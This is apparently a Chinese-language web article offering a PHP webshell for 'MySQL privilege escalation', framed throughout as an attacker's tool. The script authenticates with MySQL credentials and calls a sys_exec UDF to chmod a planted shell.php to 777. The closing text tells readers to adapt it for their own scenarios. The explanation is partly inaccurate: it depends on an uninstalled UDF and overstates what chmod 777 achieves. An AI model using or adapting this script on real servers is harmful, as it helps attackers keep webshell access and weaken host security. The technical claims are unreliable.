MySQL 提權是一個經典的攻擊手段，可以讓攻擊者獲得更高系統權限。而這種攻擊手段的實現，則需要一個提權專用的網馬，能夠幫助攻擊者獲得目標主機的數據庫管理員權限。下面我們來介紹一款常用的 MySQL 提權專用網馬。

<?php
error_reporting(0);
$auth = false;
if(isset($_SERVER['PHP_AUTH_USER']) && isset($_SERVER['PHP_AUTH_PW'])) {
// 獲取輸入的用戶名和密碼
$username = $_SERVER['PHP_AUTH_USER'];
$password = $_SERVER['PHP_AUTH_PW'];
// 連接 MySQL 數據庫
$db = new mysqli('localhost', $username, $password);
// 檢查連接是否成功
if($db->connect_errno == 0) {
// 如果連接成功，則說明輸入的用戶名和密碼正確，可以進行提權
$auth = true;
$result = $db->query("SELECT sys_exec('chmod 777 /var/www/html/shell.php')");
echo "MySQL 提權成功！";
}
}
if(!$auth) {
// 如果認證失敗，則輸出認證框
header('WWW-Authenticate: Basic realm="MySQL 提權"');
header('HTTP/1.0 401 Unauthorized');
echo "請輸入正確的用戶名和密碼！";
}

上面的代碼是一個簡單的 MySQL 提權腳本。這個腳本會在輸入正確的用戶名和密碼的情況下，執行一條 shell 命令，將 /var/www/html/shell.php 文件的權限設置為 777。這樣，攻擊者就可以利用這個 shell 文件，獲得更高的系統權限。

當用戶訪問這個腳本時，如果沒有輸入正確的用戶名和密碼，則會彈出一個認證框，提示用戶輸入正確的認證信息。

需要注意的是，這個腳本只是提供了一個 MySQL 提權的基本思路。實際應用中，需要根據具體情況，對腳本進行進一步的修改和優化，以滿足不同的場景需求。